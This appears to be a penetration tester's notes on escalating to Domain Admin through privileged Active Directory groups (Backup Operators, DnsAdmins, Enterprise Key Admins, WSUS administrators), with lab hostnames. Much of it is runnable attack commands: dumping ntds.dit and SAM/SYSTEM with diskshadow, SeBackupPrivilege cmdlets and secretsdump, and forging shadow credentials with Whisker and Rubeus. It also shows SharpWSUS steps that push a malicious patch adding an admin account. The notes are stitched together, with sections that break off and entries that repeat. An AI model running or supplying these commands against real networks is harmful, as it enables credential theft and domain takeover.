In this machine I took over of a svc-alfresco with belongs to Account Operators and other nested groups including Exchange Windows Permissions that have WriteNACL permissions against the domain. That means that I can add svc-alfresco as member of Exchange Windows Permission and then perform the DCSync attack to dump the NTDS.dit.
set context persistent nowriters
set metadata c:\\windows\\system32\\spool\\drivers\\color\\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
To leverage these privileges locally, the following steps are employed:
#Import necessary libraries:
Import-Module .\\SeBackupPrivilegeUtils.dll
Import-Module .\\SeBackupPrivilegeCmdLets.dll
#Enable the seBackupPrivilege
Set-SeBackupPrivilege
Get-SeBackupPrivilege
diskshadow /s diskshadow.txt
Copy-FileSeBackupPrivilege w:\\windows\\NTDS\\ntds.dit ntds.dit -Overwrite
reg save HKLM\\SAM SAM
reg save HKLM\\SYSTEM SYSTEM
To dump the NTDS
impacket-secretsdump -sam SAM -ntds ntds.dit -system SYSTEM local
The penetration tester discovered that the user ryan was a member of the DnsAdmins group, granting permissions to configure DNS Server settings. This misconfiguration was exploited to escalate privileges to Domain Administrator.
Steps Taken:
Payload Creation
A malicious DLL was generated using msfvenom to establish a reverse shell:
#Enable Service
#If you get: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it. (START_TYPE : 4 DISABLED)
C:\\htb> cmd /c sc config sqlbrowser start=auto
Account Operators
Account Operators, Members can modify non-protected accounts and groups in the domain.
Enterprise Key Admins, Members have the ability to write to the “msds-KeyCredentialLink” property on a user or computer. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT.
Case 1 : User has GenericAll over Enterprise Key Admins.
#Get TGT ticket
PS C:\Tools> .\Rubeus.exe asktgt /user:sentinal /password:sentinal /ptt
#Add yourself or any user to the Enterprise Key Admins
PS C:\Tools> Add-DomainGroupMember -identity 'Enterprise Key Admins' -Members 'DEV\sentinal' -Domain inlanefreight.ad -Verbose
#Adding Credentials on the msDS-KeyCredentialLink Attribute
PS C:\Tools> .\Whisker.exe add /target:DC01$ /domain:inlanefreight.ad
#Requesting TGT for DC01$ and retrieving NT hash
PS C:\Tools> .\Rubeus.exe asktgt /user:DC01$ /certificate:MIIJuAIBA<SNIP>" /domain:inlanefreight.ad /dc:DC01.INLANEFREIGHT.AD /getcredentials /show
#Performing S4U2self Request to Impersonate Administrator
PS C:\Tools> .\Rubeus.exe s4u /dc:DC01.inlanefreight.ad /ticket:doIGbDCCB<SNIP> /impersonateuser:administrator@inlanefreight.ad /ptt /self /service:host/DC01.inlanefreight.ad /altservice:cifs/DC01.inlanefreight.ad
WSU Administrator
#Create the malicious patch
PS C:\> SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"
#Aprove the malicious Patch
PS C:\> SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"
#Check the Patch status
PS C:\> SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local”
#Wait a couple minutes
Default Administrators, Domain Admins and Enterprise Admins "super" groups.
Server Operators, Members are allowed to log onto DCs locally and can modify services, access SMB shares, and backup files.
Backup Operators, Members are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs.
Print Operators, Members are allowed to logon to DCs locally and "trick" Windows into loading a malicious driver.
Hyper-V Administrators, If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins.
Account Operators, Members can modify non-protected accounts and groups in the domain.
Remote Desktop Users, Members are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol.
Remote Management Users, Members are allowed to logon to DCs with PSRemoting (This group is sometimes added to the local remote management group on non-DCs).
Group Policy Creator Owners, Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU.
Schema Admins, Members can modify the Active Directory schema structure and can backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL.
DNS Admins, Members have the ability to load a DLL on a DC but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record.
Enterprise Key Admins, Members have the ability to write to the “msds-KeyCredentialLink” property on a user or computer. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT.
